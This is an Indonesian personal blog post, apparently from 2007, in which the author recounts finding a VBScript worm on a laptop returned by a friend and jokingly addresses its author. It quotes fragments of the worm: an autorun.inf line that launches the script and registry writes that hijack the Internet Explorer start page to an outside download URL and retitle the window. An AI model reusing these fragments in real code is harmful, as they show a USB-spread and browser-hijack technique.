Kamis, 19 Juli 2007

Oleh-oleh dari Bali

Semalam temanku datang ke rumah, mengantar pulang laptopku setelah diajak "piknik" ke Bali selama seminggu.

Selepas temanku tadi pulang, langsung saja aku bangunkan laptopku ( kangen juga rasanya kau tinggal pergi ). Wow....something wrong nih. Aku menemukan sesuatu yang janggal setelah aku buka msconfig, "fu*ker ( faker )". Setelah aku lihat satu per satu drive-nya, ternyata ada autorun.inf dan fu*ker.vbs. Aku buka dua file tersebut dengan edit+. Ternyata oleh-oleh temenku yang dibawa dari Bali, diimpor dari negeri jiran.

'My name is Keith From Webchat
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe fu*ker.vbs"

Buat Keith, thanks ya..."barang" anda sudah saya terima dalam keadaan baik, jangan harap saya kembalikan. Ingat "datang tak diundang, pulang tak diantar". Lain kali kalo mau nitip oleh-oleh buat saya, kalau boleh aku minta twin towers (siapa tahu rencana bikin the edan tenanan institute of technology jadi terlaksana, lumayan nggak usah bikin gedung baru).

Explorer\Main\Start Page","http://www.awekgebu.cjb.cc/S*x.zip"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Malaysian Hackers"
if check <> 1 then
Wscript.sleep 200000
end if

Sekali lagi saya ucapkan matur thank you ya Keith, tunggu aja, aku aku akan mengatur jadwal kunjungan balasan ke tempatmu. Bukan untuk buat perhitungan, bukan demi dendam, tetapi aku mau kau mencicipi juga "oseng-oseng mercon yang dicampur dengan sedikit bubuk mesiu". Santai aja Keith, aku bukan pendendam, tapi lihat aja nanti.....waspadalah....waspadalah!!!

Tidak ada komentar:

VISITOR COUNTER